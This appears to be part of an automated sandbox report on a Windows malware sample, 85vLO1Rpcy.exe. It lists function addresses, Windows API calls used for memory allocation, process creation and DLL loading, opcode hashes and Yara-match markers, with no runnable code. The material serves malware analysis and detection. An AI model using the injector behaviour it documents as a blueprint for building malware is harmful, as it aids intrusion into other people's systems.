0x00401a12
0x00401a19
0x00401a20
0x00401a27
0x00401a2e
0x00401a35
0x00401a3c
0x00401a43
0x00401a4a
0x00401a51
0x00401a58
0x00401a5f
0x00401a66
0x00401a6d
0x00401a74
0x00401a7b
0x00401a82
0x00401a89
0x00401a90
0x00401a97
0x00401a9e
0x00401aa5
0x00401aac
0x00401ab3
0x00401aba
0x00401ac1
0x00401ac8
0x00401acf
0x00401ad6
0x00401add
0x00401ae4
0x00401aeb
0x00401af2
0x00401af9
0x00401b00
0x00401b07
0x00401b0e
0x00401b15
0x00401b1c
0x00401b23
0x00401b2a
0x00401b31
0x00401b38
0x00401b3f
0x00401b46
0x00401b4d
0x00401b54
0x00401b5b
0x00401b62
0x00401b69
0x00401b70
0x00401b77
0x00401b7e
0x00401b85
0x00401b8c
0x00401b93
0x00401b9a
0x00401ba1
0x00401ba8
0x00401baf
0x00401bb6
0x00401bbd
0x00401bc4
0x00401bcb
0x00401bd2
0x00401bd9
0x00401be0
0x00401be7
0x00401bee
0x00401bf5
0x00401bfc
0x00401c03
0x00401c0a
0x00401c11
0x00401c18
0x00401c1f
0x00401c26
0x00401c2d
0x00401c34
0x00401c3b
0x00401c42
0x00401c49
0x00401c50
0x00401c57
0x00401c5e
0x00401c65
0x00401c6c
0x00401c73
0x00401c7a
0x00401c81
0x00401c88
0x00401c8f
0x00401c96
0x00401c9d
0x00401ca4
0x00401cab
0x00401cb2
0x00401cb9
0x00401cc0
0x00401cc7
0x00401cce
0x00401cd5
0x00401cdc
0x00401ce3
0x00401cea
0x00401cf1
0x00401cf8
0x00401cff
0x00401d06
0x00401d0d
0x00401d14
0x00401d1b
0x00401d22
0x00401d29
0x00401d30
0x00401d37
0x00401d3e
0x00401d45
0x00401d4c
0x00401d53
0x00401d5a
0x00401d61
0x00401d68
0x00401d6f
0x00401d76
0x00401d7d
0x00401d84
0x00401d8b
0x00401d92
0x00401d99
0x00401da0
0x00401da7
0x00401dae
0x00401db5
0x00401dbc
0x00401dc3
0x00401dca
0x00401dd1
0x00401dd8
0x00401ddf
0x00401de6
0x00401ded
0x00401df4
0x00401dfb
0x00401e02
0x00401e09
0x00401e10
0x00401e17
0x00401e1e
0x00401e25
0x00401e2c
0x00401e33
0x00401e3a
0x00401e41
0x00401e45
0x00401e49
0x00401e4d
0x00401e51
0x00401e55
0x00401e59
0x00401e5d
0x00401e61
0x00401e65
0x00401e69
0x00401e6d
0x00401e71
0x00401e75
0x00401e79
0x00401e7d
0x00401e81
0x00401e85
0x00401e89
0x00401e8d
0x00401e91
0x00401e95
0x00401e99
0x00401e9d
0x00401ea1
0x00401ea5
0x00401ea9
0x00401ead
0x00401eb1
0x00401eb5
0x00401eb9
0x00401ebd
0x00401ec1
0x00401ec5
0x00401ec9
0x00401ecd
0x00401ed1
0x00401ed5
0x00401ed9
0x00401edd
0x00401ee1
0x00401ee5
0x00401ee9
0x00401eed
0x00401ef1
0x00401ef5
0x00401ef9
0x00401efd
0x00401f01
0x00401f05
0x00401f09
0x00401f0d
0x00401f11
0x00401f15
0x00401f19
0x00401f1d
0x00401f21
0x00401f25
0x00401f29
0x00401f2d
0x00401f31
0x00401f35
0x00401f39
0x00401f3d
0x00401f41
0x00401f45
0x00401f49
0x00401f4d
0x00401f51
0x00401f55
0x00401f59
0x00401f5d
0x00401f61
0x00401f65
0x00401f69
0x00401f6d
0x00401f71
0x00401f75
0x00401f79
0x00401f7d
0x00401f81
0x00401f85
0x00401f89
0x00401f8d
0x00401f91
0x00401f95
0x00401f99
0x00401f9d
0x00401fa1
0x00401fa5
0x00401fa9
0x00401fad
0x00401fb1
0x00401fb5
0x00401fb9
0x00401fbd
0x00401fc1
0x00401fc5
0x00401fc9
0x00401fcd
0x00401fd1
0x00401fd5
0x00401fd9
0x00401fdd
0x00401fe1
0x00401fe5
0x00401fe9
0x00401fed
0x00401ff1
0x00401ff5
0x00401ff9
0x00401ffd
0x00402001
0x00402005
0x00402009
0x0040200d
0x00402011
0x00402015
0x00402019
0x0040201d
0x00402021
0x00402025
0x00402029
0x0040202d
0x00402031
0x00402035
0x00402039
0x00402060
0x00402069

APIs

GetDC.USER32(00000000), ref: 00402059
GrayStringA.USER32(00000000), ref: 00402060

Strings

P, xrefs: 00401AAC
[, xrefs: 00401397
p, xrefs: 00401F29
t, xrefs: 00401D6F
X, xrefs: 004016A0
a, xrefs: 00401699
=, xrefs: 0040152D
U, xrefs: 0040197F
E, xrefs: 00401320
x, xrefs: 00401EDD
S, xrefs: 004017F7
C, xrefs: 00401E75
S, xrefs: 0040145B
V, xrefs: 004019FD
P, xrefs: 00401859
*, xrefs: 00401F2D
(, xrefs: 00401B15
j, xrefs: 00401939
h, xrefs: 004015CE
@, xrefs: 0040124E
S, xrefs: 004019D3
P, xrefs: 00401BFC
*, xrefs: 00401EA5
., xrefs: 00401EF5
F, xrefs: 00401351
H, xrefs: 0040122B
E, xrefs: 004019E1
A, xrefs: 00402009
h, xrefs: 00401511
P, xrefs: 0040176B
E, xrefs: 00401661
j, xrefs: 004017E9
V, xrefs: 004015F1
0, xrefs: 00401BE7
M, xrefs: 00401FD5
N, xrefs: 00401614
S, xrefs: 00401971
_, xrefs: 00401389
@, xrefs: 004014A1
h, xrefs: 00401BD9
M, xrefs: 00401286
t, xrefs: 00401ADD
3, xrefs: 0040119F
|, xrefs: 004016AE
+, xrefs: 00401C0A
S, xrefs: 004017BF
0, xrefs: 0040147E
V, xrefs: 00401041
h, xrefs: 00401CCE
}, xrefs: 00401191
^, xrefs: 00401390
W, xrefs: 0040196A
S, xrefs: 00401772
], xrefs: 004013AC
C, xrefs: 00401F51
[, xrefs: 0040157A
W, xrefs: 00401080
h, xrefs: 004017C6
2, xrefs: 00401E81
S, xrefs: 00401CF8
S, xrefs: 004018C9
s, xrefs: 00401F09
@, xrefs: 00401676
*, xrefs: 00401F19
D, xrefs: 004011C9
U, xrefs: 00401B31
h, xrefs: 00401947
3, xrefs: 00401503
@, xrefs: 00401BA1
U, xrefs: 00401FB9
h, xrefs: 00401C42
<, xrefs: 004011BB
], xrefs: 00402025
u, xrefs: 0040104F
[, xrefs: 00401F95
@, xrefs: 004014E7
P, xrefs: 004019EF
x, xrefs: 004011D7
(, xrefs: 00401702
W, xrefs: 004019F6
W, xrefs: 00401469
i, xrefs: 00401557
;, xrefs: 00401319
U, xrefs: 00401152
2, xrefs: 00401E09
2, xrefs: 00401E2C
h, xrefs: 00401573
t, xrefs: 004012B7
V, xrefs: 00401FDD
V, xrefs: 004016B5
Y, xrefs: 00401312
], xrefs: 00401542
E, xrefs: 00401E69
j, xrefs: 00401B9A
W, xrefs: 00401D14
U, xrefs: 0040141C
', xrefs: 00401E51
@, xrefs: 00401E45
2, xrefs: 004016D8
d, xrefs: 00401470
V, xrefs: 0040117C
@, xrefs: 004014B6
F, xrefs: 004010C6
P, xrefs: 004018D0
W, xrefs: 00401CF1
P, xrefs: 004011F3
h, xrefs: 00401692
u, xrefs: 00401B77
0, xrefs: 00401CDC
h, xrefs: 0040180C
U, xrefs: 00401271
p, xrefs: 004013E4
Q, xrefs: 00401D5A
;, xrefs: 00401E5D
u, xrefs: 00401A0B
$, xrefs: 00401232
h, xrefs: 00401630
V, xrefs: 00401462
3, xrefs: 0040137B
u, xrefs: 00401C34
H, xrefs: 00401A97
U, xrefs: 00401FA9
E, xrefs: 004013C1
U, xrefs: 004018DE
@, xrefs: 00401CC7
E, xrefs: 00401D4C
U, xrefs: 00401A20
^, xrefs: 00401F91
;, xrefs: 00401358
0, xrefs: 00401955
W, xrefs: 00401183
V, xrefs: 00401534
(, xrefs: 00401B5B
G, xrefs: 004011B4
u, xrefs: 00401FE5
V, xrefs: 00401653
\, xrefs: 004015B2
E, xrefs: 0040129B
_, xrefs: 00401136
t, xrefs: 0040132E
@, xrefs: 00401B54
2, xrefs: 00401F35
U, xrefs: 00401AC1
*, xrefs: 00401F3D
], xrefs: 00401144
U, xrefs: 00401343
P, xrefs: 00401AF9
P, xrefs: 004012E8
^, xrefs: 00402021
v, xrefs: 0040158F
U, xrefs: 00401867
P, xrefs: 00401D61
_, xrefs: 00401F8D
j, xrefs: 004017FE
U, xrefs: 0040102C
], xrefs: 00401FA1
w, xrefs: 004016A7
u, xrefs: 0040135F
F, xrefs: 00401A6D
+, xrefs: 00401FED
S, xrefs: 00401C03
E, xrefs: 0040187C
@, xrefs: 00401518
<, xrefs: 00401A74
U, xrefs: 00401D06
+, xrefs: 00401BCB
X, xrefs: 00401208
, xrefs: 004011FA
P, xrefs: 00401C6C
U, xrefs: 00401B8C
T, xrefs: 00401AB3
U, xrefs: 00401D92
U, xrefs: 00401C1F
Y, xrefs: 00401F89
E, xrefs: 00401C7A
u, xrefs: 00401F79
Q, xrefs: 0040116E
A, xrefs: 004017A3
u, xrefs: 00402019
r, xrefs: 00401F6D
t, xrefs: 00401FC9
>, xrefs: 00401105
8, xrefs: 004011D0
V, xrefs: 00401596
E, xrefs: 004016C3
j, xrefs: 00401CC0
r, xrefs: 0040136D
E, xrefs: 00401710
S, xrefs: 00401175
V, xrefs: 00401C65
$, xrefs: 0040143F
E, xrefs: 004015FF
^, xrefs: 0040113D
h, xrefs: 00401748
u, xrefs: 00401128
t, xrefs: 00401E25
Q, xrefs: 00401167

Memory Dump Source

Source File: 00000001.00000002.662114794.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.662104027.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.662130883.0000000000403000.00000002.00020000.sdmp Download File

Similarity

API ID: GrayString
String ID: $$$$$'$($($($*$*$*$*$+$+$+$.$0$0$0$0$2$2$2$2$2$3$3$3$8$;$;$;$<$<$=$>$@$@$@$@$@$@$@$@$@$@$A$A$C$C$D$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$G$H$H$M$M$N$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$S$S$S$S$S$S$S$S$S$S$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$X$X$Y$Y$[$[$[$\$]$]$]$]$]$^$^$^$^$_$_$_$a$d$h$h$h$h$h$h$h$h$h$h$h$h$i$j$j$j$j$j$p$p$r$r$s$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$v$w$x$x$|$}
API String ID: 215530525-437630018
Opcode ID: e8a7c627d5302c8f012b500f377ff7506ac17130ed09189a016cd865ec787a46
Instruction ID: bc81528ba8c3f15b9e92351c6048c389891c8a8e844de071d0e334785dbda44f
Opcode Fuzzy Hash: e8a7c627d5302c8f012b500f377ff7506ac17130ed09189a016cd865ec787a46
Instruction Fuzzy Hash: 6CB2161091DBE9C8DB32827C5C587CEAE611B27325F5843C9D1F83A2D2C7B50B86DB66

Uniqueness

Uniqueness Score: -1.00%

Function 02071055, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 428processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 02071233

Strings

D, xrefs: 0207108C

Memory Dump Source

Source File: 00000001.00000002.662573580.0000000002070000.00000040.00000001.sdmp, Offset: 02070000, based on PE: false

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: 92ef395988715613d0ef73858099356425dd8ea7a72b57c611a9c11be2e28da0
Instruction ID: 99a3767f2f006fe416e7acb43d25fe2cd815b67f13fc4ceddb57df57d8b30c24
Opcode Fuzzy Hash: 92ef395988715613d0ef73858099356425dd8ea7a72b57c611a9c11be2e28da0
Instruction Fuzzy Hash: 6402F370E00218EFDB55DF94C985BADBBF6BF08309F204169E519EB291D770AA81DF18

Uniqueness

Uniqueness Score: -1.00%

Function 02070AB5, Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000,00028400,00028400,00028400), ref: 02070BE0

Memory Dump Source

Source File: 00000001.00000002.662573580.0000000002070000.00000040.00000001.sdmp, Offset: 02070000, based on PE: false

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 818a0bf3dd7bb9a92d706b85f37e678221c6e14891b980e614199174a7be7dc4
Instruction ID: 7800a1a43ff8eae350e3dba68f0aa9cbf0de637b1d27c960a5929cccc15f95ee
Opcode Fuzzy Hash: 818a0bf3dd7bb9a92d706b85f37e678221c6e14891b980e614199174a7be7dc4
Instruction Fuzzy Hash: 5941C719E54348A9DB60DBE4F851BFDB7B2AF48B10F205507F908EE2E0E7B10991D749

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 020708EE, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.662573580.0000000002070000.00000040.00000001.sdmp, Offset: 02070000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: f89184851ecf2a33d8e7bc158b09fe6d1455b544f4aab103d3363b63673c015f
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: F7110632E10208EFDB10DBA9C8848AEF7FEEF54654B500165F805D3300E3709E41D664

Uniqueness

Uniqueness Score: -1.00%

Function 020709DE, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.662573580.0000000002070000.00000040.00000001.sdmp, Offset: 02070000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: 765f3a822d62cbf7e7298ddedcce9c8c328bd6edd63f5629f74d4f972c1d5d5a
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: 13E01235B64649AFC754CBA8C841D55B3F9EB19724F154394FC15C73A0E734EE00EA54

Uniqueness

Uniqueness Score: -1.00%

Function 02070A1C, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.662573580.0000000002070000.00000040.00000001.sdmp, Offset: 02070000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: d9aa35bbe87457b43194d6bedb851233f5a2d999aae369782ba7de8322c72fdd
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: E5E08636B116509FC361DA1DC480D56F3EAEB882B0B15457AE849D3B11C370FC00D654

Uniqueness

Uniqueness Score: -1.00%

Function 0207099F, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.662573580.0000000002070000.00000040.00000001.sdmp, Offset: 02070000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 85vLO1Rpcy.exe PID: 6872 Parent PID: 6800 85vLO1Rpcy.exeCOMMON

Executed Functions

Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182BD, 004182C4
b=A, xrefs: 004182A2, 004182B0
!:A, xrefs: 0041829C, 004182A8

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Strings

6HCU, xrefs: 004183AC

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 6HCU
API String ID: 2167126740-1255677348
Opcode ID: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
Instruction ID: 785ee6bdb1737b7ece5f68c773e4035cb9a370b06d5a2f4bb549206f88432f0d
Opcode Fuzzy Hash: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
Instruction Fuzzy Hash: 4DF0F8B5200208ABCB14DF99DC81EEB77A9AF8C754F158149BE5897251D630E911CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418222, Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
Instruction ID: eb2fcad7cfbb8d36c8c07e65e7b1c2717ee67fb2c70223fbf7d83cf3cf0a7d26
Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
Instruction Fuzzy Hash: 62F0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7205C635E8028B64

Uniqueness

Uniqueness Score: -1.00%

Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD

Strings

&5A, xrefs: 004184C2, 004184CC

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418675, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
Instruction ID: 9a823f8c78894249dba104d5ea0f087799ce9c1430a6f2244117b3d31d4b0435
Opcode Fuzzy Hash: 2b22221c3b210471ff1b8bf9103a91c95a37d647fff54dc2bc040ec3afc8e04c
Instruction Fuzzy Hash: 4B01ADB22042446FDB24DFA5DC89EEB7B68EF84350F14859DF98D5B282C930E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004184D4, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
Instruction ID: ab81e3b6ab6d3b91ce71e5eff0dc86bffa658c17d00b5c940c9f491b72657ba9
Opcode Fuzzy Hash: bcc1ec7d6e7d6ac1d184e4638b90497378ca44e04d2126619acfb57251e404be
Instruction Fuzzy Hash: 24E0D8BC2442851BDB04EE69E4908E73795FF85354714994EEC9987307C534D8568BB1

Uniqueness

Uniqueness Score: -1.00%

Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418512, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
Instruction ID: dd81a4506f34eb1dc815d8e525c1c8e650a7b6415f3c6e3ee69276a5238c3cd9
Opcode Fuzzy Hash: 122aecf94cc41ec917835493dfd9b606af23139f21e44ad84ef64d83a3c9c8b1
Instruction Fuzzy Hash: 12E04F31600615BFC324DF65CC85FE33B64AF59790F0545ADF91A9B682C631A601CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00418642, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

